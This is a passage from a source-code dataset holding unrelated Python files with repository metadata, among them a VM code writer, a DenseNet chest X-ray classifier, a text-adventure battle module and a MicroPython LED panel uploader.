def write_pop(self,seg,index):
self.write_cmd("pop",seg,index)
def write_arithmetic(self,cmd):
self.write_cmd(cmd)
def write_label(self,label):
self.write_cmd("label",label)
def write_goto(self,label):
self.write_cmd("goto", label)
def write_if(self,label):
self.write_cmd("if-goto", label)
def write_call(self,name,nargs):
self.write_cmd("call",name,nargs)
def write_function(self,name,nlocals):
self.write_cmd("function",name,nlocals)
def write_return(self):
self.write_cmd("return")
#Non Standard i.e. Helper
def push_const(self,val):
self.write_push('constant',val)
def push_arg(self, argnum):
self.write_push('argument', argnum)
def push_this_ptr(self):
self.write_push('pointer', 0)
def pop_this_ptr(self):
self.write_pop('pointer', 0)
def pop_that_ptr(self):
self.write_pop('pointer', 1)
def push_that(self):
self.write_push('that', 0)
def pop_that(self):
self.write_pop('that', 0)
def push_temp(self, temp_num):
self.write_push('temp', temp_num)
def pop_temp(self, temp_num):
self.write_pop('temp', temp_num)
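A short usage example, since the file ships no demo: emit a trivial VM function that leaves 7 on the stack.
writer = VMWriter('Seven.vm')
writer.write_function('Main.seven', 0)  # function Main.seven 0
writer.push_const(3)                    # push constant 3
writer.push_const(4)                    # push constant 4
writer.write_arithmetic('add')          # add
writer.write_return()                   # return
writer.close()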
| 25.132353
| 74
| 0.576946
| 1,696
| 0.992393
| 0
| 0
| 0
| 0
| 0
| 0
| 170
| 0.099473
|
afc24baeb3d33abb5be32b2647fa2afb09362e83
| 1,945
|
py
|
Python
|
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | 3
|
2021-03-21T07:43:12.000Z
|
2021-07-23T11:07:55.000Z
|
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | null | null | null |
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | 2
|
2021-04-11T13:26:29.000Z
|
2021-07-25T18:03:34.000Z
|
from typing import Any, Dict, List, Optional, cast
from pathlib import Path
import yaml
CONFIG_FILE_NAME = "config.yml"
CONFIG_DIRS = (
Path.home() / Path(".yrs"),
Path("/etc/youtube-rss-subscriber"),
)
class Config:
_instance: Optional["Config"] = None
_config: Dict[str, Any]
_required_keys: List[str] = ["database_url"]
def __new__(cls) -> "Config":
if cls._instance is None:
cls._instance = super(Config, cls).__new__(cls)
config_file_path = None
for c in CONFIG_DIRS:
file_path = c / Path(CONFIG_FILE_NAME)
if c.is_dir() and file_path.is_file():
config_file_path = file_path
if config_file_path is None:
config_file_path = init()
with open(config_file_path, "r") as cfile:
cls._config = cast(Dict[str, Any], yaml.safe_load(cfile))
for k in cls._required_keys:
try:
cls._config[k]
except KeyError:
raise RuntimeError(f"Invalid configuration: '{k}' missing")
return cls._instance
@property
def database_url(self) -> str:
return cast(str, self._config["database_url"])
@property
def youtube_dl_opts(self) -> Dict[str, Any]:
return cast(Dict[str, Any], self._config["youtube_dl_opts"])
def init() -> Path:
config_dir = CONFIG_DIRS[0]
config_dir.mkdir(exist_ok=True)
config_file_path = config_dir / Path(CONFIG_FILE_NAME)
with open(config_file_path, "w") as cfile:
yaml.dump(
{
"database_url": f"sqlite:///{config_dir}/yrs.db",
"youtube_dl_opts": {
"outtmpl": "%(title)s-%(id)s.%(ext)s",
},
},
stream=cfile,
)
print(f"Config file created in {config_file_path}")
return config_file_path
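# Usage sketch (an added example): Config caches a single instance in
# __new__, so repeated construction returns the same object. Note that
# instantiating it creates a default config file if none exists yet.
if __name__ == "__main__":
    cfg = Config()
    assert cfg is Config()  # singleton: both names point at one instance
    print(cfg.database_url)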
| 28.602941
| 79
| 0.568123
| 1,183
| 0.608226
| 0
| 0
| 226
| 0.116195
| 0
| 0
| 295
| 0.151671
|
afc59e6ec8b3a8d303a471a47f51dc9d406f4096
| 222
|
py
|
Python
|
rastervision/analyzer/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | 4
|
2019-03-11T12:38:15.000Z
|
2021-04-06T14:57:52.000Z
|
rastervision/analyzer/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | null | null | null |
rastervision/analyzer/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | 1
|
2021-02-25T18:23:27.000Z
|
2021-02-25T18:23:27.000Z
|
# flake8: noqa
from rastervision.analyzer.analyzer import *
from rastervision.analyzer.analyzer_config import *
from rastervision.analyzer.stats_analyzer import *
from rastervision.analyzer.stats_analyzer_config import *
| 31.714286
| 57
| 0.846847
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 14
| 0.063063
|
afc811788a0b3ab1c60a2765e44c7a8fefe57ab0
| 2,010
|
py
|
Python
|
Chest X-Ray Analysis/model.py
|
HarshShah03325/Emotion_Recognition
|
d1760bbdedc55014896f0e1c7db47ee5e5a19dae
|
[
"MIT"
] | 20
|
2021-11-08T05:43:31.000Z
|
2021-11-09T15:39:03.000Z
|
Chest X-Ray Analysis/model.py
|
HarshShah03325/Emotion_Recognition
|
d1760bbdedc55014896f0e1c7db47ee5e5a19dae
|
[
"MIT"
] | null | null | null |
Chest X-Ray Analysis/model.py
|
HarshShah03325/Emotion_Recognition
|
d1760bbdedc55014896f0e1c7db47ee5e5a19dae
|
[
"MIT"
] | 1
|
2021-10-31T02:53:05.000Z
|
2021-10-31T02:53:05.000Z
|
from tensorflow.keras.applications.densenet import DenseNet121
from tensorflow.keras.layers import Dense, GlobalAveragePooling2D
from tensorflow.keras.models import Model
from keras import backend as K
from settings import Settings
import numpy as np
from helper import get_train_labels, compute_class_freqs
from tensorflow.python.framework.ops import disable_eager_execution
disable_eager_execution()
settings = Settings()
def get_weighted_loss(pos_weights, neg_weights, epsilon=1e-7):
"""
Custom loss function that calculates loss based on positive and negative weights.
Weights are inversely proportional to frequencies.
returns:
weighted loss.
"""
def weighted_loss(y_true, y_pred):
loss = 0.0
for i in range(len(pos_weights)):
            loss += -1 * K.mean(pos_weights[i] * y_true[:, i] * K.log(y_pred[:, i] + epsilon)) + -1 * K.mean(neg_weights[i] * (1 - y_true[:, i]) * K.log(1 - y_pred[:, i] + epsilon))
return loss
return weighted_loss
def denseNet():
"""
Builds and compiles the keras DenseNet model.
returns:
Untrained DenseNet model.
"""
base_model = DenseNet121(weights='./densenet.hdf5', include_top=False)
x = base_model.output
# add a global spatial average pooling layer
x = GlobalAveragePooling2D()(x)
# and a logistic layer
predictions = Dense(len(settings.labels), activation="sigmoid")(x)
pos_weights, neg_weights = compute_class_freqs(get_train_labels())
model = Model(inputs=base_model.input, outputs=predictions)
model.compile(optimizer='adam', loss=get_weighted_loss(pos_weights, neg_weights), experimental_run_tf_function=False)
return model
def load_model():
"""
Builds keras DenseNet model and loads pretrained weights into the model.
returns:
Trained DenseNet model.
"""
model = denseNet()
model.load_weights("./pretrained_model.h5")
return model
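# Usage sketch (an added example; assumes the weight files referenced above,
# './densenet.hdf5' and './pretrained_model.h5', are present on disk):
if __name__ == '__main__':
    model = load_model()
    # one dummy RGB image at DenseNet-121's default 224x224 input size
    dummy_batch = np.zeros((1, 224, 224, 3), dtype=np.float32)
    print(model.predict(dummy_batch).shape)  # (1, len(settings.labels))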
| 30
| 201
| 0.698507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 570
| 0.283582
|
afcab14f17dffbf6475626aeb921c67d6e9af7bc
| 4,494
|
py
|
Python
|
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
import math
import matplotlib.pyplot as plt
from numpy.lib.polynomial import poly
import pandas as pd
from matplotlib import cm
import matplotlib.patheffects as path_effects
import random
class Run:
def __init__(self, run_name, linearities, leniencies, ids):
self.run_name = run_name
self.linearities = linearities
self.leniencies = leniencies
self.ids = ids
self.sample_size = len(linearities)
self.PerformCalculations()
def PerformCalculations(self):
self.min_leniency = min(self.leniencies)
self.max_leniency = max(self.leniencies)
self.normalized_leniencies = list(map(lambda x: self.normalize(x, self.min_leniency, self.max_leniency), self.leniencies))
self.min_linearity = min(self.linearities)
self.max_linearity = max(self.linearities)
self.normalized_linearities = list(map(lambda x: self.normalize(x, self.min_linearity, self.max_linearity), self.linearities))
self.average_linearity = sum(self.linearities)/len(self.linearities)
self.average_leniency = sum(self.leniencies)/len(self.leniencies)
self.average_point = (self.average_linearity, self.average_leniency)
self.normalized_average_point = (self.normalize(self.average_linearity, self.min_linearity, self.max_linearity), self.normalize(self.average_leniency, self.min_leniency, self.max_leniency))
self.std_linearity = np.std(self.linearities)
self.std_leniency = np.std(self.leniencies)
def normalize(self, x, min, max):
return (x - min) / (max - min)
def __str__(self):
return f'<name: {self.run_name}, sample_size: {len(self.ids)}, average linearity: {round(self.average_linearity, 2)}, average leniency: {round(self.average_leniency, 2)}>'
def __repr__(self):
return str(self)
def print_random_samples_of_maps(run, num):
random_sample = random.sample(run.ids, num)
for sample in random_sample:
print((sample, run.normalized_linearities[sample], run.normalized_leniencies[sample], run.linearities[sample], run.leniencies[sample]))
def find_same_normalized_data_point(id_list1, id_list2, normalized_linearity, normalized_leniency, linearity_weight):
firstLevel = min(id_list1, key=lambda entry:abs(entry[1]-normalized_linearity)*linearity_weight+abs(entry[2]-normalized_leniency))
secondLevel = min(id_list2, key=lambda entry:abs(entry[1]-normalized_linearity)*linearity_weight+abs(entry[2]-normalized_leniency))
return (firstLevel, secondLevel)
filename = 'example_generator_config.txt'
run_names = []
number_of_maps_to_randomly_sample = 0
with open(filename) as f:
name_of_everything = f.readline().rstrip('\n')
number_of_maps_to_randomly_sample = int(f.readline())
run_name = f.readline()
while run_name != "":
run_names.append(run_name.rstrip('\n'))
run_name = f.readline()
print(run_names)
number_of_runs = len(run_names)
runs = []
for i in range(len(run_names)):
run_name = run_names[i]
run_file_name = f'{run_name}/data.txt'
with open(run_file_name) as f:
display_name = f.readline()
ids = []
leniencies = []
linearities = []
id = f.readline()
while id != "":
ids.append(int(id))
leniency = f.readline().rstrip('\n').replace(',',".")
leniencies.append(float(leniency))
linearity = f.readline().rstrip('\n').replace(',',".")
linearities.append(float(linearity))
id = f.readline()
runs.append(Run(display_name, linearities, leniencies, ids))
normalized_id_lists = []
for run in runs:
normalized_id_lists.append(list(zip(run.ids, run.normalized_linearities, run.normalized_leniencies, run.linearities, run.leniencies)))
print_random_samples_of_maps(runs[0], number_of_maps_to_randomly_sample)
print("Enter normalized linearity")
normalized_linearity = float(input())
print("Enter normalized leniency")
normalized_leniency = float(input())
print("How weighted should linearity be?")
linearity_weight = float(input())
print("Which runs to get it from")
print("Run nmbr 1")
run_number_1 = int(input())
print("Run nmbr 2")
run_number_2 = int(input())
id_list1 = normalized_id_lists[run_number_1]
id_list2 = normalized_id_lists[run_number_2]
print(find_same_normalized_data_point(id_list1, id_list2, normalized_linearity, normalized_leniency, linearity_weight))
| 36.536585
| 198
| 0.715398
| 1,660
| 0.369381
| 0
| 0
| 0
| 0
| 0
| 0
| 390
| 0.086782
|
afcbed072ad157da39a96ed8b309d2b6f0eb45c5
| 781
|
py
|
Python
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 1
|
2018-11-01T02:58:35.000Z
|
2018-11-01T02:58:35.000Z
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 13
|
2019-03-13T13:21:42.000Z
|
2020-05-27T21:55:40.000Z
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 2
|
2019-08-01T07:01:31.000Z
|
2021-12-20T05:09:02.000Z
|
from datetime import datetime
from pyetheroll.utils import EtherollUtils, timestamp2datetime
class TestEtherollUtils:
def test_compute_profit(self):
bet_size = 0.10
chances_win = 34
payout = EtherollUtils.compute_profit(bet_size, chances_win)
assert payout == 0.19
bet_size = 0.10
# chances of winning must be less than 100%
chances_win = 100
payout = EtherollUtils.compute_profit(bet_size, chances_win)
assert payout is None
class TestUtils:
def test_timestamp2datetime(self):
assert timestamp2datetime("1566645978") == (
datetime(2019, 8, 24, 11, 26, 18)
)
assert timestamp2datetime("0x5d611eda") == (
datetime(2019, 8, 24, 11, 26, 18)
)
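# Illustrative sketch (an addition, not part of the test suite): the expected
# value 0.19 above is consistent with the usual dice payout formula shown
# below. This reconstruction is an assumption inferred from the test data,
# not EtherollUtils' actual implementation.
def approx_profit(bet_size, chances_win, house_edge=0.01):
    if chances_win >= 100:
        return None  # chances of winning must be below 100%
    chances_loss = 100 - chances_win
    return round(bet_size * (chances_loss / chances_win) * (1 - house_edge), 2)

assert approx_profit(0.10, 34) == 0.19
assert approx_profit(0.10, 100) is None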
| 28.925926
| 68
| 0.644046
| 681
| 0.871959
| 0
| 0
| 0
| 0
| 0
| 0
| 67
| 0.085787
|
afcd6032574bba34bea8e6fbfd6741b9fd4aa205
| 270
|
py
|
Python
|
micropython/002_plot_test.py
|
mirontoli/tolle-rasp
|
020638e86c167aedd7b556d8515a3adef70724af
|
[
"MIT"
] | 2
|
2021-06-29T17:18:09.000Z
|
2022-01-25T08:29:59.000Z
|
micropython/002_plot_test.py
|
mirontoli/tolle-rasp
|
020638e86c167aedd7b556d8515a3adef70724af
|
[
"MIT"
] | null | null | null |
micropython/002_plot_test.py
|
mirontoli/tolle-rasp
|
020638e86c167aedd7b556d8515a3adef70724af
|
[
"MIT"
] | null | null | null |
# https://codewith.mu/en/tutorials/1.0/microbit
from microbit import *
flag = True
while True:
sleep(100)
if button_a.was_pressed():
flag = not flag
if flag:
print((accelerometer.get_x(),))
else:
print(accelerometer.get_values())
| 22.5
| 47
| 0.637037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 47
| 0.174074
|
afcecca0aaa83b41a9ff96c5213253a69fa739e1
| 153
|
py
|
Python
|
osbot_aws/helpers/Fargate_Cluster.py
|
artem7902/OSBot-AWS
|
4b676b8323f18d3d9809d41263f3a71745ec2828
|
[
"Apache-2.0"
] | null | null | null |
osbot_aws/helpers/Fargate_Cluster.py
|
artem7902/OSBot-AWS
|
4b676b8323f18d3d9809d41263f3a71745ec2828
|
[
"Apache-2.0"
] | null | null | null |
osbot_aws/helpers/Fargate_Cluster.py
|
artem7902/OSBot-AWS
|
4b676b8323f18d3d9809d41263f3a71745ec2828
|
[
"Apache-2.0"
] | null | null | null |
from osbot_aws.apis.Fargate import Fargate
class Fargate_Cluster(Fargate):
def __init__(self, account_id):
super().__init__(account_id)
| 15.3
| 42
| 0.732026
| 105
| 0.686275
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
afceefa6ab42fdff336bb5e178d3b569a6751ee3
| 7,156
|
py
|
Python
|
adventxtend.py
|
Textovortex/AdventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | 1
|
2021-04-16T12:04:56.000Z
|
2021-04-16T12:04:56.000Z
|
adventxtend.py
|
leha-code/adventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | 2
|
2021-04-16T16:16:47.000Z
|
2021-04-18T01:19:06.000Z
|
adventxtend.py
|
leha-code/adventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | null | null | null |
'''
________ ________ ___ ___ _______ ________ _________ ___ ___ _________ _______ ________ ________
|\ __ \|\ ___ \|\ \ / /|\ ___ \ |\ ___ \|\___ ___\|\ \ / /|\___ ___\\ ___ \ |\ ___ \|\ ___ \
\ \ \|\ \ \ \_|\ \ \ \ / / | \ __/|\ \ \\ \ \|___ \ \_|\ \ \/ / ||___ \ \_\ \ __/|\ \ \\ \ \ \ \_|\ \
\ \ __ \ \ \ \\ \ \ \/ / / \ \ \_|/_\ \ \\ \ \ \ \ \ \ \ / / \ \ \ \ \ \_|/_\ \ \\ \ \ \ \ \\ \
\ \ \ \ \ \ \_\\ \ \ / / \ \ \_|\ \ \ \\ \ \ \ \ \ / \/ \ \ \ \ \ \_|\ \ \ \\ \ \ \ \_\\ \
\ \__\ \__\ \_______\ \__/ / \ \_______\ \__\\ \__\ \ \__\/ /\ \ \ \__\ \ \_______\ \__\\ \__\ \_______\
\|__|\|__|\|_______|\|__|/ \|_______|\|__| \|__| \|__/__/ /\ __\ \|__| \|_______|\|__| \|__|\|_______|
|__|/ \|__|
By | |_|_| /\_|_._ _ o.__|_ _
|_|_| |/--\|_|_||_)(_)|| ||_(_)\/\/
_/ _/ _/ _/ _/ _/ _/_/_/ _/_/_/_/_/
_/ _/_/_/ _/_/ _/_/_/ _/_/_/ _/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/_/ _/ _/_/ _/_/ _/_/ _/ _/
_/ _/ _/ _/_/_/_/ _/ _/ _/_/ _/_/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/_/_/ _/_/ _/ _/ _/ _/ _/
_/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
_/ _/ _/_/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/_/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/ _/ _/ _/_/_/ _/
'''
try: from adventurelib import Item, say, Bag  # importing dependencies
except ImportError: from adstrangerlib import Item, say, Bag
from random import choice, randint
import time
__version__ = "0.0.3"
class Character(Item):
'''
The character.'''
def __init__(self, name, desc, hp, dp, powers=None, exp=None):
'''
The character. Do NOT use the variable "character"'''
self.name = name
self.desc = desc
self.hp = hp
self.dp = dp
self.powers = powers
self.exp = exp
self.list = Bag()
class Player(Character):
'''
The player class extends the character.
'''
def __init__(self, name, hp, dp_range, powers=None, exp=None, lvl=None):
self.name = name
self.hp = hp
self.dp = dp_range
self.powers = powers
self.exp = exp
self.lvl = lvl
class Battle():
def __init__(self, lose_msg, win_msg, character_, player_, reset_func,
death_msg="You Died.",
vict_msg="You Won!",
prompt ="Enter a power >",
unknown_power="Choose a valid power"):
'''
lose_msg = messages when the player loses; is a list
win_msg = when the player wins; is a list
character_ = the character the player battles; is a Character object
player_ = the player variable; is a Player object
reset_func = function to reset your game if the player loses the battle.; is a function
'''
self.lose_msg = lose_msg
self.win_msg = win_msg
self.character = character_
        self.character_save_hp = character_.hp  # snapshot the starting HP (storing the object itself would just alias self.character)
self.player = player_
self.reset_func = reset_func
self.death_msg = death_msg
self.vict_msg = vict_msg
self.prompt = prompt
self.unk_power = unknown_power
    def start(self):
        '''
        Starts the battle.
        '''
        self.finished = False  # the battle is not finished yet
while not self.finished:
if self.player.hp <= 0:
say(self.death_msg) # RIP you
self.reset_func() # run the reset function, as it is going to
self.finished = True
                self.character.hp = self.character_save_hp  # reset the enemy for a future battle
break
elif self.character.hp <= 0: # Oh, yay, now do I have to beat that troll over there?
say(self.vict_msg)
self.finished = True
                self.character.hp = self.character_save_hp  # reset the enemy for a future battle
break
say(f"You have {self.player.hp} \u2665")
time.sleep(0.5)
#message = choice(choice([self.win_msg, self.lose_msg])) # generate a random message
say(f"You are fighting the {self.character.name}") # yes, I do need to know when I am fighting the
#response = input(f"\u2665 {self.player.hp}\nChoose a power > ")
#if response in self.player.powers:
# say(f'You {response} the {self.character.name}')
# self.character.hp -= self.player.dp
# say(f"The {self.character.name} has now {self.character.hp} health points")
# say(message)
# if message in self.win_msg:
# self.player.hp += self.character.dp
# self.player.hp -= self.character.dp
# say(f"The {self.character.name} fights you back and you lose {self.character.dp} HP")
#else:
# say("Choose a valid power") # yeah, do you really expect me?
self.fighter = choice([self.player, self.character])
time.sleep(0.5)
if self.fighter is self.player:
for power in self.player.powers:
say(f"You have the power to {power}")
time.sleep(0.3)
power = input(self.prompt)
if power in self.player.powers:
self.character.hp -= randint(self.player.dp[0],self.player.dp[1])
say(choice(self.win_msg))
else:
say(self.unk_power)
else:
self.player.hp -= self.character.dp
time.sleep(1)
say(choice(self.lose_msg))
time.sleep(1)
say(f"The {self.character.name} has {self.character.hp} \u2665")
| 50.394366
| 237
| 0.396311
| 4,238
| 0.59223
| 0
| 0
| 0
| 0
| 0
| 0
| 4,325
| 0.604388
|
afceffc0fa04029d539709b408be0aca115cbc14
| 415
|
py
|
Python
|
student.py
|
gabrielmccoll/python-learning
|
253dcf9df647dbdcaaeac498c962db39868d6604
|
[
"MIT"
] | null | null | null |
student.py
|
gabrielmccoll/python-learning
|
253dcf9df647dbdcaaeac498c962db39868d6604
|
[
"MIT"
] | null | null | null |
student.py
|
gabrielmccoll/python-learning
|
253dcf9df647dbdcaaeac498c962db39868d6604
|
[
"MIT"
] | null | null | null |
students = []
class Student:
school_name = "Springfield Elementary"
    # pass  # a bare "pass" tells the interpreter to do nothing (leftover from the empty-class stub)
def __init__(self,name, student_id=332):
self.name = name
self.student_id = student_id
students.append(self)
def __str__(self):
return "Student " + self.name
def get_name_capitalize(self):
return self.name.capitalize()
def get_school_name(self):
return self.school_name
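# Usage sketch (an added example): create a couple of students and exercise
# the class attribute and instance methods.
if __name__ == "__main__":
    homer = Student("homer")
    lisa = Student("lisa", student_id=118)
    print(homer)                       # Student homer
    print(lisa.get_name_capitalize())  # Lisa
    print(lisa.get_school_name())      # Springfield Elementary
    print(len(students))               # 2 (the constructor registers both)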
| 21.842105
| 48
| 0.73253
| 400
| 0.963855
| 0
| 0
| 0
| 0
| 0
| 0
| 81
| 0.195181
|
afcf06799a4c681aefacbbab3bd0c395c6f657a8
| 700
|
py
|
Python
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | 1
|
2019-01-26T14:53:36.000Z
|
2019-01-26T14:53:36.000Z
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | 3
|
2018-08-05T14:53:55.000Z
|
2019-01-27T11:15:45.000Z
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | null | null | null |
from ampy.pyboard import Pyboard
from ampy.files import Files
from .files import led_panel_client, max7219
from os.path import basename
from sys import argv
def put():
"""
Uploads all necessary files to the pyboard.
"""
if len(argv) < 2:
print("Pyboard COM port not specified. Usage: led_panel_client_put /dev/tty.wchusbserial1410")
exit(1)
pyboard_pyboard = Pyboard(argv[1])
pyboard_files = Files(pyboard_pyboard)
files_to_put = led_panel_client() | max7219()
for file_path in files_to_put:
name = basename(file_path)
with open(file_path) as file_object:
data = file_object.read()
pyboard_files.put(name, data)
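# Usage sketch (an added note): put() doubles as the console entry point and
# reads the serial port from sys.argv, e.g.
#   led_panel_client_put /dev/tty.wchusbserial1410
if __name__ == "__main__":
    put()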
| 28
| 102
| 0.687143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 146
| 0.208571
|
afcfa558f77ea2152e94c0d489367f3ae1bc234b
| 3,241
|
py
|
Python
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 2
|
2021-07-30T10:04:18.000Z
|
2022-01-30T18:29:30.000Z
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 1
|
2021-10-17T20:08:41.000Z
|
2021-10-17T20:08:41.000Z
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 2
|
2021-07-30T10:04:20.000Z
|
2021-09-01T00:07:14.000Z
|
'''
Into to deep learning Koopman operators
===
Author: Nicholas Geneva (MIT Liscense)
url: https://nicholasgeneva.com/blog/
github: https://github.com/NickGeneva/blog-code
===
'''
import numpy as np
import random
import argparse
import os, errno, copy, json
import torch
class Parser(argparse.ArgumentParser):
def __init__(self):
super(Parser, self).__init__(description='Read')
self.add_argument('--exp-dir', type=str, default="./koopman", help='directory to save experiments')
self.add_argument('--exp-name', type=str, default="duffing", help='experiment name')
self.add_argument('--model', type=str, default="fcnn", choices=['fcnn'], help='experiment name')
# data
self.add_argument('--ntrain', type=int, default=200, help="number of training data")
        self.add_argument('--ntest', type=int, default=5, help="number of testing data")
self.add_argument('--stride', type=int, default=10, help="number of time-steps as encoder input")
self.add_argument('--batch-size', type=int, default=16, help='batch size for training')
# training
self.add_argument('--epoch-start', type=int, default=0, help='epoch to start at, will load pre-trained network')
self.add_argument('--epochs', type=int, default=300, help='number of epochs to train')
self.add_argument('--lr', type=float, default=0.001, help='ADAM learning rate')
self.add_argument('--seed', type=int, default=12345, help='manual seed used in PyTorch and Numpy')
# logging
self.add_argument('--plot-freq', type=int, default=25, help='how many epochs to wait before plotting test output')
self.add_argument('--test-freq', type=int, default=5, help='how many epochs to test the model')
self.add_argument('--ckpt-freq', type=int, default=5, help='how many epochs to wait before saving model')
self.add_argument('--notes', type=str, default='')
def mkdirs(self, *directories):
'''
Makes a directory if it does not exist
'''
for directory in list(directories):
try:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def parse(self, dirs=True):
'''
Parse program arguements
Args:
dirs (boolean): True to make file directories for predictions and models
'''
args = self.parse_args()
args.run_dir = args.exp_dir + '/' + '{}'.format(args.exp_name) \
+ '/{}_ntrain{}_batch{}_{}'.format(args.model, args.ntrain, args.batch_size, args.notes)
args.ckpt_dir = args.run_dir + '/checkpoints'
args.pred_dir = args.run_dir + "/predictions"
        if dirs:
self.mkdirs(args.run_dir, args.ckpt_dir, args.pred_dir)
# Set random seed
if args.seed is None:
args.seed = random.randint(1, 10000)
random.seed(args.seed)
torch.manual_seed(args.seed)
np.random.seed(seed=args.seed)
if dirs:
with open(args.run_dir + "/args.json", 'w') as args_file:
json.dump(vars(args), args_file, indent=4)
return args
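# Usage sketch (an added example): parse arguments without creating run
# directories, then inspect the derived paths and the seeded RNG state.
if __name__ == '__main__':
    args = Parser().parse(dirs=False)  # dirs=False: no folders, no args.json
    print(args.run_dir, args.ckpt_dir, args.seed)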
| 41.551282
| 122
| 0.624499
| 2,967
| 0.915458
| 0
| 0
| 0
| 0
| 0
| 0
| 1,156
| 0.35668
|
afcfa7df8b6551e0c9178682429e9831edd629a5
| 1,767
|
py
|
Python
|
tests/test_write_basic_udf.py
|
eodcgmbh/eodc-openeo-bindings
|
4e80eba036771a0c81359e1ac66862f1eead407b
|
[
"MIT"
] | null | null | null |
tests/test_write_basic_udf.py
|
eodcgmbh/eodc-openeo-bindings
|
4e80eba036771a0c81359e1ac66862f1eead407b
|
[
"MIT"
] | 7
|
2020-02-18T17:12:31.000Z
|
2020-09-24T07:19:04.000Z
|
tests/test_write_basic_udf.py
|
eodcgmbh/eodc-openeo-bindings
|
4e80eba036771a0c81359e1ac66862f1eead407b
|
[
"MIT"
] | null | null | null |
"""
This test checks the input file generation of a basic job using a python UDF.
"""
import os
from eodc_openeo_bindings.job_writer.basic_writer import BasicJobWriter
def test_basic_python_udf(test_folder, out_filepath_basic, backend_processes, S2_filepaths_short):
evi_file = os.path.join(test_folder, 'process_graphs', 'udf_python.json')
BasicJobWriter().write_job(process_graph_json=evi_file, job_data='./output_udf_python',
process_defs=backend_processes, in_filepaths=S2_filepaths_short, output_filepath=out_filepath_basic)
with open(out_filepath_basic) as outfile:
out_content = outfile.read()
filepath_split = os.path.splitext(out_filepath_basic)[0]
filename = filepath_split.split(os.path.sep)[-1]
ref_filepath = os.path.join(os.environ['REF_JOBS'], filename + '_udf_python_ref.py')
with open(ref_filepath) as outfile:
ref_content = outfile.read()
assert out_content == ref_content
def test_basic_r_udf(test_folder, out_filepath_basic, backend_processes, S2_filepaths_short):
evi_file = os.path.join(test_folder, 'process_graphs', 'udf_r.json')
BasicJobWriter().write_job(process_graph_json=evi_file, job_data='./output_udf_r',
process_defs=backend_processes, in_filepaths=S2_filepaths_short, output_filepath=out_filepath_basic)
with open(out_filepath_basic) as outfile:
out_content = outfile.read()
filepath_split = os.path.splitext(out_filepath_basic)[0]
filename = filepath_split.split(os.path.sep)[-1]
ref_filepath = os.path.join(os.environ['REF_JOBS'], filename + '_udf_r_ref.py')
with open(ref_filepath) as outfile:
ref_content = outfile.read()
assert out_content == ref_content
| 39.266667
| 131
| 0.739106
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 238
| 0.134692
|
afd07ae84271209f560ab1e8af1cb6cd4f30c6a7
| 336
|
py
|
Python
|
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | 10
|
2018-09-05T15:20:05.000Z
|
2020-06-01T03:57:08.000Z
|
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
